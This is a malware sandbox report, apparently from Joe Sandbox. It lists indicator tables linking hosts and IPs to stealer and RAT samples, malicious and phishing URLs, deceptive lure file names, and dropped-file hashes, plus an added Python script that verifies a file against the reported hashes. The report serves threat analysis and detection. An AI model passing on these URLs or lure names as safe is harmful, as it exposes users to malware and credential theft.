| 149.154.167.99 | http://cryptorabotakzz.com/ | malicious | Unknown | telegram.org/ |
| 149.154.167.99 | http://cache.netflix.com.id1.wuush.us.kg/ | malicious | Unknown | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217 |
| 149.154.167.99 | http://investors.spotify.com.sg2.wuush.us.kg/ | malicious | Unknown | telegram.org/ |
| 149.154.167.99 | http://bekaaviator.kz/ | malicious | Unknown | telegram.org/ |
| 149.154.167.99 | http://telegramtw1.org/ | malicious | Unknown | telegram.org/?setln=pl |
| 149.154.167.99 | http://makkko.kz/ | malicious | Unknown | telegram.org/ |
| 149.154.167.99 | http://telegram.dog | malicious | Unknown | telegram.dog/ |
| 149.154.167.99 | LnSNtO8JIa.exe | malicious | Cinoshi Stealer | t.me/cinoshibot |
| 149.154.167.99 | jtfCFDmLdX.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT | t.me/cinoshibot |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| raw.githubusercontent.com | file.exe | malicious | Amadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, Vidar | 185.199.108.133 |
| raw.githubusercontent.com | file.exe | malicious | Discord Token Stealer, DotStealer | 185.199.110.133 |
| raw.githubusercontent.com | ft.exe | malicious | LummaC Stealer | 185.199.108.133 |
| raw.githubusercontent.com | main.exe | malicious | Unknown | 185.199.109.133 |
| raw.githubusercontent.com | Pdf Reader.exe | malicious | Stealerium | 185.199.110.133 |
| raw.githubusercontent.com | file.exe | malicious | Discord Token Stealer, DotStealer | 185.199.108.133 |
| raw.githubusercontent.com | gKWbina3a4.bat | malicious | Stealerium | 185.199.108.133 |
| raw.githubusercontent.com | TikTokDesktop18.exe | malicious | Stealc, Vidar | 185.199.110.133 |
| raw.githubusercontent.com | TTDesktop18.exe | malicious | Stealc, Vidar | 185.199.111.133 |
| raw.githubusercontent.com | TTDesktop18.exe | malicious | Stealc, Vidar | 185.199.111.133 |
| t.me | jtkhikadjthsad.exe | malicious | Vidar | 149.154.167.99 |
| t.me | file.exe | malicious | Vidar | 149.154.167.99 |
| t.me | o26qobnkQI.exe | malicious | Vidar | 149.154.167.99 |
| t.me | xoJxSAotVM.exe | malicious | Vidar | 149.154.167.99 |
| t.me | ton.exe | malicious | Vidar | 149.154.167.99 |
| t.me | ton.exe | malicious | Vidar | 149.154.167.99 |
| t.me | mtbkkesfthae.exe | malicious | Vidar | 149.154.167.99 |
| t.me | https://cocain.vip/ | malicious | Unknown | 149.154.167.99 |
| t.me | TikTokDesktop18.exe | malicious | Stealc, Vidar | 149.154.167.99 |
| github.com | https://github.com/kernelwernel/VMAware/releases/download/v1.9/vmaware64.exe | malicious | Unknown | 20.233.83.145 |
| github.com | SplpM1fFkV.exe | malicious | Unknown | 20.233.83.145 |
| github.com | PO24002292.jar | malicious | Caesium Obfuscator, STRRAT | 140.82.121.4 |
| github.com | TikTokDesktop18.exe | malicious | Stealc, Vidar | 20.233.83.145 |
| github.com | TTDesktop18.exe | malicious | Stealc, Vidar | 20.233.83.145 |
| github.com | TTDesktop18.exe | malicious | Stealc, Vidar | 20.233.83.145 |
| github.com | TT18.exe | malicious | Stealc, Vidar | 20.233.83.145 |
| github.com | Loader.exe | malicious | LummaC Stealer | 20.233.83.145 |
| github.com | rookie_2.30.0_portable.zip | malicious | Unknown | 20.233.83.145 |
| github.com | secondaryTask.vbs | malicious | Clipboard Hijacker, MicroClip, Remcos | 20.233.83.145 |
| kresk.lol | jtkhikadjthsad.exe | malicious | Vidar | 159.69.102.165 |
| kresk.lol | file.exe | malicious | Vidar | 159.69.102.165 |
| kresk.lol | o26qobnkQI.exe | malicious | Vidar | 159.69.102.165 |
| kresk.lol | xoJxSAotVM.exe | malicious | Vidar | 159.69.102.165 |
| kresk.lol | ton.exe | malicious | Vidar | 159.69.102.165 |
| kresk.lol | ton.exe | malicious | Vidar | 159.69.102.165 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| TELEGRAMRU | jtkhikadjthsad.exe | malicious | Vidar | 149.154.167.99 |
| TELEGRAMRU | file.exe | malicious | Vidar | 149.154.167.99 |
| TELEGRAMRU | rOJS25YL2e.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| TELEGRAMRU | Uii3leknna.exe | malicious | Unknown | 149.154.167.220 |
| TELEGRAMRU | Uii3leknna.exe | malicious | Unknown | 149.154.167.220 |
| TELEGRAMRU | DxWl6xEBp7.exe | malicious | Unknown | 149.154.167.220 |
| TELEGRAMRU | DxWl6xEBp7.exe | malicious | Unknown | 149.154.167.220 |
| TELEGRAMRU | Teklif Talebi #U0130hale No_14991_PDF.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| TELEGRAMRU | Ziraat Bankasi Swift Mesaji.pdf.exe | malicious | MassLogger RAT | 149.154.167.220 |
| TELEGRAMRU | rukT6hBo6P.exe | malicious | Phemedrone Stealer | 149.154.167.220 |
| FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.1.91 |
| FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.65.91 |
| FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.193.91 |
| FASTLYUS | https://trinasolarus-my.sharepoint.com/:f:/g/personal/matt_hutchison_trinasolar_com/EuTm6V8CKxFPmV0-8tDYkU8B7bgg8BNpE1Urptg3NNJsZw?e=bQub2M | malicious | Unknown | 151.101.2.137 |
| FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.1.91 |
| FASTLYUS | https://bdb142c8309e44b2310105b0e00240d6.surge.sh/ | malicious | Unknown | 151.101.194.137 |
| FASTLYUS | https://indiollanero7nudos.com | malicious | Unknown | 151.101.129.181 |
| FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.65.91 |
| FASTLYUS | file.exe | malicious | Amadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, Vidar | 185.199.108.133 |
| FASTLYUS | file.exe | malicious | Credential Flusher | 151.101.1.91 |
| HETZNER-ASDE | jtkhikadjthsad.exe | malicious | Vidar | 159.69.102.165 |
| HETZNER-ASDE | file.exe | malicious | Vidar | 159.69.102.165 |
| HETZNER-ASDE | rukT6hBo6P.exe | malicious | Phemedrone Stealer | 49.12.121.47 |
| HETZNER-ASDE | o26qobnkQI.exe | malicious | Vidar | 159.69.102.165 |
| HETZNER-ASDE | https://ammyy.com/en/downloads.html | malicious | Flawedammyy | 136.243.18.118 |
| HETZNER-ASDE | Advertising Agreement for Youtube Cooperation.scr | malicious | LummaC Stealer | 148.251.0.164 |
| HETZNER-ASDE | xoJxSAotVM.exe | malicious | Vidar | 159.69.102.165 |
| HETZNER-ASDE | ton.exe | malicious | Vidar | 159.69.102.165 |
| HETZNER-ASDE | ton.exe | malicious | Vidar | 159.69.102.165 |
| HETZNER-ASDE | x86.elf | malicious | Mirai | 144.79.65.48 |
| MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | LummaC Stealer | 13.107.246.63 |
| MICROSOFT-CORP-MSN-AS-BLOCKUS | 17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exe | malicious | Remcos | 52.228.161.161 |
| MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | LummaC Stealer | 13.107.246.63 |
| MICROSOFT-CORP-MSN-AS-BLOCKUS | https://trinasolarus-my.sharepoint.com/:f:/g/personal/matt_hutchison_trinasolar_com/EuTm6V8CKxFPmV0-8tDYkU8B7bgg8BNpE1Urptg3NNJsZw?e=bQub2M | malicious | Unknown | 20.42.73.31 |
| MICROSOFT-CORP-MSN-AS-BLOCKUS | Welcome To Raise.eml | malicious | Unknown | 52.109.76.243 |
| MICROSOFT-CORP-MSN-AS-BLOCKUS | https://bdb142c8309e44b2310105b0e00240d6.surge.sh/ | malicious | Unknown | 150.171.28.10 |
| MICROSOFT-CORP-MSN-AS-BLOCKUS | https://indiollanero7nudos.com | malicious | Unknown | 20.70.246.20 |
| MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | LummaC Stealer | 13.107.246.63 |
| MICROSOFT-CORP-MSN-AS-BLOCKUS | sF5nNt8usL.bat | malicious | Unknown | 13.107.9.158 |
| MICROSOFT-CORP-MSN-AS-BLOCKUS | oLY6JbNl9i.bat | malicious | Unknown | 13.107.9.158 |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | http://fdgfhvcfdgfhhjh.gharelokhana.com/common/login | malicious | HTMLPhisher | 20.233.83.145, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | rOJS25YL2e.exe | malicious | Snake Keylogger, VIP Keylogger | 20.233.83.145, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | Uii3leknna.exe | malicious | Unknown | 20.233.83.145, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | Uii3leknna.exe | malicious | Unknown | 20.233.83.145, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | DxWl6xEBp7.exe | malicious | Unknown | 20.233.83.145, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | Z8HJ4RohXr.msi | malicious | Unknown | 20.233.83.145, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | DxWl6xEBp7.exe | malicious | Unknown | 20.233.83.145, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | Teklif Talebi #U0130hale No_14991_PDF.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 20.233.83.145, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | Ziraat Bankasi Swift Mesaji.pdf.exe | malicious | MassLogger RAT | 20.233.83.145, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | rukT6hBo6P.exe | malicious | Phemedrone Stealer | 20.233.83.145, 185.199.111.133
37f463bf4616ecd445d4a1937da06e19 | jtkhikadjthsad.exe | malicious | Vidar | 159.69.102.165, 149.154.167.99
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 159.69.102.165, 149.154.167.99
37f463bf4616ecd445d4a1937da06e19 | 1733325245efb540ba670bc87cda05695e7839c909eeca3e1633b495d258461820ead14a47442.dat-decoded.exe | malicious | Unknown | 159.69.102.165, 149.154.167.99
37f463bf4616ecd445d4a1937da06e19 | FwhEhTLFjX.lnk | malicious | Unknown | 159.69.102.165, 149.154.167.99
37f463bf4616ecd445d4a1937da06e19 | 7oE3oHSo29.lnk | malicious | Unknown | 159.69.102.165, 149.154.167.99
37f463bf4616ecd445d4a1937da06e19 | zLL6hlzpzh.lnk | malicious | Unknown | 159.69.102.165, 149.154.167.99
37f463bf4616ecd445d4a1937da06e19 | RcF6bkWVZQ.lnk | malicious | Unknown | 159.69.102.165, 149.154.167.99
37f463bf4616ecd445d4a1937da06e19 | 3FHcnOdHz2.lnk | malicious | Unknown | 159.69.102.165, 149.154.167.99
37f463bf4616ecd445d4a1937da06e19 | N6qmjsVv1D.lnk | malicious | Unknown | 159.69.102.165, 149.154.167.99
37f463bf4616ecd445d4a1937da06e19 | fcEkpnbfeG.lnk | malicious | Unknown | 159.69.102.165, 149.154.167.99
                                                                                                                                                                      No context
                                                                                                                                                                      Process:C:\Users\user\Desktop\Ttok18.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):476160
                                                                                                                                                                      Entropy (8bit):7.302597587896513
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:fVpxoBb+6pIE70i+cif0o5HDl5nUnOpvJ3wpUfcx+43+jyQ/D5PvugK/alI1DB4E:6Ii+cni3h3wpUy+5jyqFvlMfQWt
                                                                                                                                                                      MD5:F453C5F8C736FF8C381E7022CAD85E3E
                                                                                                                                                                      SHA1:1906C904A33B1910B88F2020A7942776AB7AD54E
                                                                                                                                                                      SHA-256:36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
                                                                                                                                                                      SHA-512:B9A64DAA7591029D966D8AC6684C1EB049F6A3F89865FB760E0EBFE57DC300D3F6F50DACE3353E461370655A8D8BF518AC7B176C574F73ECD43713AD9851282F
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Mg..........................................@...........................(.............................................H.................................(........................................\...........P................................text............................... ....rdata..............................@..@.data...D!".........................@....00cfg........'.....................@..@.reloc.......(.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
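Each dropped-file record above carries the size, the 8-bit entropy and the MD5/SHA1/SHA-256/SHA-512 digests an analyst needs to confirm that a file recovered from a host is the same artifact. The following Python is an added example and not part of the Joe Sandbox report: it parses one such record (a constructed copy of the first record above, values as printed) and checks a local file against it. It assumes the report's "Entropy (8bit)" field is Shannon entropy in bits per byte; the file path on the command line and the entropy tolerance are illustrative.

```python
import hashlib
import math
import re
import sys
from collections import Counter

# Constructed copy of the first dropped-file record above (values as printed in the report).
RECORD_TEXT = """\
Process:C:\\Users\\user\\Desktop\\Ttok18.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):476160
Entropy (8bit):7.302597587896513
MD5:F453C5F8C736FF8C381E7022CAD85E3E
SHA1:1906C904A33B1910B88F2020A7942776AB7AD54E
SHA-256:36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
Malicious:true
"""

# 'Key:Value' with no space after the colon, as the report prints it; keys may contain
# spaces, hyphens and parentheses ("Size (bytes)", "SHA-256"). Bullet sub-lines are skipped.
FIELD_RE = re.compile(r"^([A-Za-z0-9 ()\-]+):(.*)$")


def parse_record(text: str) -> dict:
    """Parse one dropped-file record into a {field: value} dict."""
    rec = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if m:
            rec[m.group(1).strip()] = m.group(2).strip()
    return rec


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant file, 8.0 for uniform bytes.
    Assumed (not confirmed by the report) to be what 'Entropy (8bit)' measures."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """Upper-case hex digests keyed by the report's field names."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def check_file(data: bytes, rec: dict, entropy_tol: float = 0.01) -> dict:
    """Compare file bytes against a parsed record. Returns {field: matched?} for every
    field the record carries; a file that matches no digest is not the reported artifact."""
    result = {}
    if "Size (bytes)" in rec:
        result["Size (bytes)"] = len(data) == int(rec["Size (bytes)"])
    d = digests(data)
    for field in ("MD5", "SHA1", "SHA-256", "SHA-512"):
        if field in rec:
            result[field] = d[field] == rec[field].upper()
    if "Entropy (8bit)" in rec:
        reported = float(rec["Entropy (8bit)"])
        result["Entropy (8bit)"] = abs(shannon_entropy(data) - reported) <= entropy_tol
    return result


if __name__ == "__main__":
    # Usage: python check_dropped.py <path-to-local-copy>   (path is illustrative)
    rec = parse_record(RECORD_TEXT)
    with open(sys.argv[1], "rb") as fh:
        for field, ok in check_file(fh.read(), rec).items():
            print(f"{field:15} {'match' if ok else 'MISMATCH'}")
```

A size or entropy match alone says nothing; only a digest match ties the local file to the report. The entropy figure is still useful on its own: a packed or encrypted payload sits near 8.0, while the 7.30 reported here is consistent with a PE that is partly compressed and partly plain code.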
                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                      Entropy (8bit):1.307360196865577
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr4:KooCEYhgYEL0In
                                                                                                                                                                      MD5:8AABD071749C511AC5351F2892B64EF6
                                                                                                                                                                      SHA1:1ECEC62EFF27C2E6CD0731B4038E13E82982BBF1
                                                                                                                                                                      SHA-256:F5DAB9BB7D3103818961C97B23F603707BE714077BE84F6172838AB2FB72538F
                                                                                                                                                                      SHA-512:4C07F78B150FF8668E7CD166456CF434E2F0732FA6A66C847E072B185A46C9BB3E7D32C00DFA1BE0DAC0C8946062D68D10E2C82F56A770A218ED6E35C0611114
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd21536d5, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                      Entropy (8bit):0.4221598173107011
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                                                                                                                                                                      MD5:ED297DB9F4D0137243D4B8BF507248D0
                                                                                                                                                                      SHA1:E91957F2F7C29E416E407E677DA9CD3C6E7FEE06
                                                                                                                                                                      SHA-256:4ED6F4C3E9D2BA16E444F7AF5FB858BE254CBEDDBCA52DD8CE89B7BACD0132BA
                                                                                                                                                                      SHA-512:FA6EF4E4CAFBB0D71321F5AA46DBB102F2C089F5963C71BC3AFC2F45825F00B1A697B130B6865177871F37A5821BEB256BF12305BC74EF866FA621CEB73B16D1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..6.... .......A.......X\...;...{......................0.!..........{A.)....|9.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................<...)....|9.................."..)....|9..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                      Entropy (8bit):0.07649569181953877
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:pEUYe7dp/lgejjn13a/IzklYllcVO/lnlZMxZNQl:WUz7bdj53qIzsIOewk
                                                                                                                                                                      MD5:FE0FA007CD8FBE14A3C0FE7E819B9002
                                                                                                                                                                      SHA1:684F8FA67668E95D9DB631B07DF4F1A5F6ED101A
                                                                                                                                                                      SHA-256:F9B8B92B5AFB4582A2C31A3AED6BC979A41923EA603160D74B9444388866A30D
                                                                                                                                                                      SHA-512:A7CC669AB8C3725AB8ED5190E106186A0AAB63BECECF5003CF0E0691C2F252B15A5CC93697DE23F00314DAD1AC22D94F05F4D5DF9730FEE0EEFC6F807EC3C7CB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.a]......................................;...{..)....|9......{A..............{A......{A..........{A]................."..)....|9.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.694985340190863
Encrypted:false
SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:false

Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.699548026888946
Encrypted:false
SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:A0DC32426FC8BF469784A49B3D092ADC
SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:false

Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false

Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false

Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):49152
Entropy (8bit):0.8180424350137764
Encrypted:false
SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:349E6EB110E34A08924D92F6B334801D
SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:false

Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):294912
Entropy (8bit):0.08436842005578409
Encrypted:false
SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
MD5:2CD2840E30F477F23438B7C9D031FC08
SHA1:03D5410A814B298B068D62ACDF493B2A49370518
SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
Malicious:false

Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.687722658485212
Encrypted:false
SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:9A59DF7A478E34FB1DD60514E5C85366
SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:false

Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.687722658485212
Encrypted:false
SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:9A59DF7A478E34FB1DD60514E5C85366
SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:false

Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.694985340190863
Encrypted:false
SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:false

Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                      Entropy (8bit):4.699548026888946
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                      MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                      SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                      SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                      SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):126976
                                                                                                                                                                      Entropy (8bit):0.47147045728725767
                                                                                                                                                                      Encrypted:false
